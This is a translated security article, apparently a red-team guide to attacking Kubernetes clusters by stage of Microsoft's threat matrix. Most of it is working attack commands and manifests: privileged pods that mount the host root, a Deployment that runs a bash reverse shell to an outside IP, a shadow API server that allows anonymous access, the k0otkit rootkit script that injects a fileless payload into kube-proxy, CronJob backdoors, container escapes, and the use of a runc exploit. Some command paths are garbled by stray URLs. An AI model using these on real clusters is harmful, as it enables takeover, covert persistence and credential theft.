Cloud-native Kubernetes security

With more and more enterprises beginning to move to the cloud, in the attack and defense exercises, we often encounter cloud-related scenarios, such as: public cloud, private cloud, hybrid cloud, virtualized clusters, etc. The previous penetration path was 'breakout from the external network -> privilege escalation -> permission maintenance -> information collection -> lateral movement -> cyclic information collection' until the important target system was obtained. However, with the introduction of cloud-based business and virtualization technology, this situation has changed, and new intrusion paths have been opened, such as:

Attack the cloud management platform through virtual machines and use the management platform to control all machines
Escape through containers to control the host machine and laterally penetrate to the K8s Master node to control all containers
Using KVM-QEMU/execution escape to obtain the host machine, enter the physical network for lateral movement and control the cloud platform

Currently, there are many scattered attack methods for cloud-native scenarios on the Internet, and only some manufacturers have released related matrix technologies, but without much detail. This article expands on the Kubernetes threat matrix released by Microsoft and introduces the specific attack methods.

^{The red flag is the attacker}^{The most}^{Technical points of concern}^.

Initial access

Unauthorized access to API Server
Unauthorized access to kubelet
Public exposure of Docker Daemon
Leakage of K8s configfile

Unauthorized access to API Server

The API Server serves as the management entry for the K8s cluster, usually using ports 8080 and 6443, among which port 8080 does not require authentication, and port 6443 requires authentication with TLS protection. If developers use port 8080 and expose it to the public network, attackers can directly issue commands to the cluster through the API of this port.

Another scenario is that the operations personnel configure incorrectly, binding the "system:anonymous" user to the "cluster-admin" user group, thereby allowing anonymous users to issue commands to the cluster internally with administrative privileges.

# View pods
https://192.168.4.110:6443/api/v1/namespaces/default/pods?limit=500
# Create a privileged container
https://192.168.4.110:6443/api/v1/namespaces/default/pods/test-4444
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test-4444\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test-4444\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test-4444","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-4444","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}
# Execute command
https://192.168.4.110:6443/api/v1/namespace/default/pods/test-4444/exec?command=whoami

Detailed explanation of creating a privileged container:

^{Create privileged container}

Leakage of K8s configfile

The K8s configfile is a management credential for the K8s cluster, which contains detailed information about the K8s cluster (API Server, login credentials).

If the attacker can access this file (such as an office network employee machine intrusion, code leaked to Github, etc.), they can directly take control of the K8s cluster through the API Server, bringing potential risks and hazards.

User credentials are stored in the kubeconfig file, and kubectl finds the kubeconfig file in the following order:

If the --kubeconfig parameter is provided, use the provided kubeconfig file.
If the --kubeconfig parameter is not provided but the environment variable $KUBECONFIG is set, use the kubeconfig file provided by the environment variable.
If neither of the above two situations occur, kubectl uses the default kubeconfig file $HOME/.kube/config.

Process to fully utilize the K8s configfile:

K8s configfile --> Create backdoor Pod/Mount host path --> Enter container via Kubectl --> Escape using mounted directory.

#Linux installation of kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
#Content into config, or specify options, need to modify the Server address
kubectl --kubeconfig k8s.yaml
#Get the acquired images
kubectl get pods --all-namespaces --insecure-skip-tls-verify=true -o jsonpath="{..image}" |tr -s '[[:space:]]' '\n' |sort |uniq -c
#Create Pod pod.yaml, mount the host file of the root directory of the host
apiVersion: v1
kind: Pod
metadata:
  name: test-444
spec:
  containers:
  - name: test-444
    image: nginx:1.14.2
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
#Create pod in the default namespace
kubectl apply -f pod.yaml -n default --insecure-skip-tls-verify=true
#Enter the container
kubectl exec -it test-444 bash -n default --insecure-skip-tls-verify=true
#Switch to bash, escape successful
cd /host
chroot https://www.freebuf.com/articles/database/ bash

Public exposure of Docker Daemon

Docker operates in a C/S mode, where the docker daemon service runs in the background and is responsible for managing container creation, running, and stopping operations.

On Linux hosts, the docker daemon listens on the unix socket created at /var/run/docker.sock, with port 2375 used for unauthenticated HTTP communication and port 2376 for trusted HTTPS communication.

When Docker is initially installed, the default setting will open port 2375 to the outside. Currently, it only allows local access by default.

The configuration for an administrator to enable remote access is as follows:

#Enable remote access
vim /lib/systemd/system/docker.service
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 -containerd=/run/containerd/containerd.sock

Detection and exploitation of unauthorized access to Docker Daemon:

#Detect unauthorized access
curl http://192.168.238.129:2375/info
docker -H tcp://192.168.238.129:2375 info
# It is recommended to use this method, which is convenient to operate.
export DOCKER_HOST="tcp://192.168.238.129:2375"

Docker Daemon Unauthorized Practical Case:

Execute

Using Service Account

CURL method request
kubectl method request

Using Service Account

In the Pods created by the K8s cluster, the containers carry the authentication credentials of the K8s Service Account by default, located at: (/run/secrets/kubernetes.io/serviceaccount/token)

If the operation and maintenance personnel do not configure RBAC (Role-Based Access Control) properly and do not set it, attackers can obtain the Token through the Pod to authenticate the API Server.

In the lower version v1.15.11, Kubernetes does not enable RBAC control by default. Starting from version 1.16, RBAC access control policy is enabled by default. From version 1.18, RBAC has become a stable feature.

The following is a scenario for accessing the API Server using the Token in a Pod:

# Point to the internal API server hostname
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
# Set the path of the ServiceAccount token
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
# Read the namespace of pods and set it as a variable.
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
# Read the anonymous token of ServiceAccount
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
# CACERT Path
export CACERT=${SERVICEACCOUNT}/ca.crt
Execute the following command to view all Namespaces in the current cluster.
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces
# Write yaml, create privileged pod
cat > nginx-pod.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: test-444
spec:
  containers:
  - name: test-444
    image: nginx:1.14.2
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
EOF
# Create pod
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -k ${APISERVER}/api/v1/namespaces/default/pods -X POST --header 'content-type: application/yaml' --data-binary @nginx-pod.yaml
# View information
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/default/pods/nginx
# Execute command
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespace/default/pods/test-444/exec?command=ls&command=-l
or
api/v1/namespaces/default/pods/nginx-deployment-66b6c48dd5-4djlm/exec?command=ls&command=-l&container=nginx&stdin=true&stdout=true&tty=true

Persistence

DaemonSets, Deployments
Shadow API
Rootkit
cronjob persistence

Deployment

When creating containers, enabling DaemonSets and Deployments allows containers and sub-containers to be recovered even if they are cleaned up, attackers often exploit this feature for persistence. The concepts involved include:

ReplicationController (RC)

ReplicationControllerEnsure that a specific number of Pod replicas are running at all times.

Replication Set (RS)

Replication Set, abbreviated as RS, is recommended by the official to replace RC. In fact, RS and RC have basically the same functions, and the only difference at present is that RC only supports selector based on equality

Deployment

The main responsibility is the same as that of RC,They are to ensure the number and health of Pods, and most of their functions are completely consistent, which can be regarded as an upgraded version of the RC controller

The official components kube-dns and kube-proxy also use Deployment to manage

Here, Deployment is used to deploy the backdoor

# dep.yaml
apiVersion: apps/v1
kind: Deployment # Ensure that a specific number of Pod replicas are running at all times
metadata:
  name: nginx-deploy
  labels:
    k8s-app: nginx-demo
spec:
  replicas: 3 # Specify the number of Pod replicas
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: nginx
        image: nginx:1.7.9
        imagePullPolicy: IfNotPresent
        command: ["bash"] # Reverse Shell
        args: ["-c", "bash -i >& /dev/tcp/192.168.238.130/4242 0>&1"]
        securityContext:
          privileged: true # Privileged mode
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
          type: Directory
# Create
kubectl create -f dep.yaml

Shadow API Server

If a shadow API server has been deployed, then this API server has the same functions as the current API server in the cluster. It also enables all k8s permissions, accepts anonymous requests without saving audit logs, which will facilitate the attacker's traceless management of the entire cluster and subsequent penetration actions.

Configuration and exploitation of Shadow API Server:

Configuration file path:
/etc/systemd/system/kube-apiserver-test.service
#One-click deployment Shadow apiserver
https://www.freebuf.com/articles/database/cdk run k8s-shadow-apiserver default
#One-click deployment will add the following options to the configuration file:
--allow-privileged
--insecure-port=9443
--insecure-bind-address=0.0.0.0
--secure-port=9444
--anonymous-auth=true
--authorization-mode=AlwaysAllow
#kcurl access and exploitation
https://www.freebuf.com/articles/database/cdk kcurl anonymous get https://192.168.1.44:9443/api/v1/secrets

Rootkit

Here is introduced a k8s rootkit, k0otkit is a general post-exploitation technique that can be used for penetration testing of Kubernetes clusters. With k0otkit, you can operate all nodes in the target Kubernetes cluster in a fast, stealthy, and continuous manner (reverse shell).

Technologies used by K0otkit:

DaemonSet and Secret resources (fast and continuous反弹, resource isolation)
kube-proxy image (make use of local materials)
Dynamic container injection (high stealth)
Meterpreter (traffic encryption)
Fileless attack (high stealth)

#Generate k0otkit
https://www.freebuf.com/articles/database/pre_exp.sh
#Listen
https://www.freebuf.com/articles/database/handle_multi_reverse_shell.sh

Copy the content of k0otkit.sh to the master for execution:

volume_name=cache
mount_path=/var/kube-proxy-cache
ctr_name=kube-proxy-cache
binary_file=/usr/local/bin/kube-proxy-cache
payload_name=cache
secret_name=proxy-cache
secret_data_name=content

ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metadata:
  name: $secret_name
  namespace: kube-system
type: Opaque
data:
  $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA......
# inject malicious container into kube-proxy pod
kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
  | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n        hostPath:\n          path: /\n          type: Directory\n" \
  | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n        image: $image\n        imagePullPolicy: IfNotPresent\n        command: [\"sh\"]\n        args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n        env:\n          - name: $payload_name\n            valueFrom:\n              secretKeyRef:\n                name: $secret_name\n                key: $secret_data_name\n        securityContext:\n          privileged: true\n        volumeMounts:\n        - mountPath: $mount_path\n          name: $volume_name\"
  | kubectl --kubeconfig /root/.kube/config replace -f -

cronjob persistence

CronJob is used to execute periodic actions, such as backups, report generation, etc., and attackers can use this feature for persistence.

apiVersion: batch/v1
kind: CronJob		#Use CronJob object
metadata:
  name: hello
spec:
  schedule: "*/1 * * * *"	#Execute once a minute
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hello
            image: busybox
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - #Reverse Shell or Trojan	
          restartPolicy: OnFailure

Privilege Elevation

Privileged Container Escape
Docker Vulnerability
Linux Capabilities Escape

Privileged Container Escape

When the container starts with the --privileged option, the container can access all devices on the host machine.

While the K8s configuration file enables privileged: true:

spec:
containers:
- name: ubuntu
image: ubuntu:latest
securityContext:
privileged: true

Practical Case:

Obtain WebShell through the vulnerability, check if .dockerenv exists in the root directory, and use fdisk -l to view the disk directory, then perform directory escape:

#Operation under Webshell

fdisk -l

mkdir /tmp/test

mount /dev/sda3 /tmp/test

chroot /tmp/test bash

Docker Vulnerability

Here, two well-known Docker escape vulnerabilities are introduced.

CVE-2020-15257

Before version 1.3.9 of Containerd and version 1.4.0~1.4.2, the --host network mode was used, which would cause the containerd-shim API to be exposed, and escape can be achieved by calling the API function.

Characteristics of Host mode:

Share the host machine's network
No loss of network performance
There is no isolation between container networks
Network resources cannot be separately counted
Port management is difficult
Port mapping is not supported

#Determine if host mode is used
cat /proc/net/unix | grep 'containerd-shim'

#Reverse shell of the host machine to the remote server

https://www.freebuf.com/articles/database/cdk_linux_386 run shim-pwn reverse 192.168.238.159 4455

CVE-2019-5736

When runc is dynamically compiled, it will load dynamic link libraries from the container image, causing the loading of malicious dynamic libraries; when /prco/self/exe (i.e., runc) is opened, malicious programs in the malicious dynamic link libraries will be executed. Since the malicious program inherits the file handles opened by runc, it can replace the runc on the host through the file handle.

After that, when executing commands related to runc again, an escape will occur.

Version vulnerability:

docker version <=18.09.2

RunC version <=1.0-rc6

Exploitation process:

#Download POC
https://github.com/Frichetten/CVE-2019-5736-PoC
#Compile
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

The success of the exploitation is to copy the /etc/shadow file to the /tmp/ directory.

#Copy the compiled main to the docker container, in practice, it is used to upload WebShell
docker cp main name:/home
cd /home/
chmod 777 main
https://www.freebuf.com/articles/database/main
#At this time, when the administrator enters the container, it will trigger:

Or change line 16 to reverse shell to obtain host privileges.

Capabilities

Capabilities are a security mechanism in Linux, introduced after Linux kernel 2.2, mainly used for more granular control of permissions. The container community has been working hard to implement the concepts and principles of defense in depth and minimum privilege.

Currently, Docker has changed the black list mechanism of Capabilities to the default prohibition of all Capabilities, and then grants the minimum permissions required for container operation in the whitelist manner.

#View Capabilities
cat /proc/self/status | grep CapEff
capsh --print

Capabilities allow the execution of system management tasks, such as loading or unloading file systems, setting disk quotas, and so on.

cap_sys_ptrace-container
cap_sys_admin-container
cap_dac_read_search-container

There are not many actual scenarios, and the escape methods can be referred to in the mounted directory.

Detection

Internal network scanning
K8s common port scanning
Cluster internal network

Cluster internal network scanning

There are four main types of communication in the Kubernetes network

Communication between containers within the same Pod
Communication between Pods
Communication between Pods and Service
Communication between external traffic to the cluster and Service

So there is no difference from regular internal network penetration, nmap, masscan, and other scans

K8s common port scanning

Cluster internal network

The Flannel network plugin uses the 10.244.0.0/16 network by default
Calico uses the 192.168.0.0/16 network by default

Horizontal Movement

Taint (Taint) Horizontal Penetration

Taint (Taint) Horizontal Penetration

Taints are a feature of advanced K8s scheduling, used to limit which Pods can be scheduled to a specific node. Generally, the master node contains a taint that prevents Pods from being scheduled to the master node unless there are Pods that can tolerate this taint. And usually, Pods that tolerate this taint are system-level Pods, such as kube-system

^{A pod can only be scheduled to a node if it tolerates the node's taints}

Control the taints on Pod creation to inject creation to nodes within the cluster.

#View node information in the Node
[root@node1 ~]# kubectl get nodes
NAME              STATUS                     ROLES    AGE   VERSION
192.168.238.129   Ready,Sche/du/lingDisabled   master   30d   v1.21.0
192.168.238.130   Ready,Sche/du/lingDisabled   master   30d   v1.21.0
192.168.238.131   Ready                      node     30d   v1.21.0
192.168.238.132   Ready                      node     30d   v1.21.0
#Confirm the toleration of the Master node
[root@node1 ~]# kubectl describe nodes 192.168.238.130
Name:               192.168.238.130
Roles:              master
Labels:             beta.kubernetes.io/arch=amd64
                    beta.kubernetes.io/os=linux
                    kubernetes.io/arch=amd64
                    kubernetes.io/hostname=192.168.238.130
                    kubernetes.io/os=linux
                    kubernetes.io/role=master
Annotations:        flannel.alpha.coreos.com/backend-data: {"VtepMAC":"66:3b:20:6a:eb:ff"{}
                    flannel.alpha.coreos.com/backend-type: vxlan
                    flannel.alpha.coreos.com/kube-subnet-manager: true
                    flannel.alpha.coreos.com/public-ip: 192.168.238.130
                    node.alpha.kubernetes.io/ttl: 0
                    volumes.kubernetes.io/controller-managed-attach-detach: true
CreationTimestamp:  Tue, 14 Sep 2021 17:41:30 +0800
Taints:             node.kubernetes.io/unschedulable:NoSchedule
#Create a Pod with toleration parameters
kubectl create -f control-master.yaml
#control-master.yaml content:
apiVersion: v1
kind: Pod
metadata:
  name: control-master-15
spec:
  tolerations:
    - key: node.kubernetes.io/unschedulable
      operator: Exists
      effect: NoSchedule
  containers:
    - name: control-master-15
      image: ubuntu:18.04
      command: ["/bin/sleep", "3650d"]
      volumeMounts:
      - name: master
        mountPath: /master
  volumes:
  - name: master
    hostPath:
      path: /
      type: Directory

Conclusion

Currently, black hat groups are mining by bulk scanning and then using unauthorized access.
Current offensive and defensive technologies are in the primary stage, but with the development of cloud-native attack weapons, the threshold for attacks will also be correspondingly reduced.
New types of attack methods such as virtual machine/container escape attacks and supply chain attacks will show a rapid growth trend. Such attacks are very difficult and can cause significant harm and impact.
Private cloud deployment in the enterprise business production network, the underlying network of the cloud, physical devices, and business network are in the same security domain, and are often lacking effective isolation.
Private cloud products belong to customized development, using a large number of third-party components, which will be exposed with time and the research of security researchers.

Reference links:

Team/T/NT Targets Kubernetes, Nearly 50,000 IPs Compromised in Worm-like Attack
https://www.trendmicro.com/en_us/research/21/e/teamtnt-targets-kubernetes--nearly-50-000-ips-compromised.html
Threat matrix for Kubernetes
https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
Kubernetes Attack Surface
https://www.optiv.com/insights/source-zero/blog/kubernetes-attack-surface
Attack methods and defenses on Kubernetes
https://dione.lib.unipi.gr/xmlui/handle/unipi/12888
k0otkit
https://github.com/Metarget/k0otkit
CVE-2019-5736-Poc
https://github.com/Frichetten/CVE-2019-5736-PoC
Announcement of Docker operating system command injection vulnerability (CVE-2019-5736)
https://support.huaweicloud.com/bulletin-cce/cce_bulletin_0015.html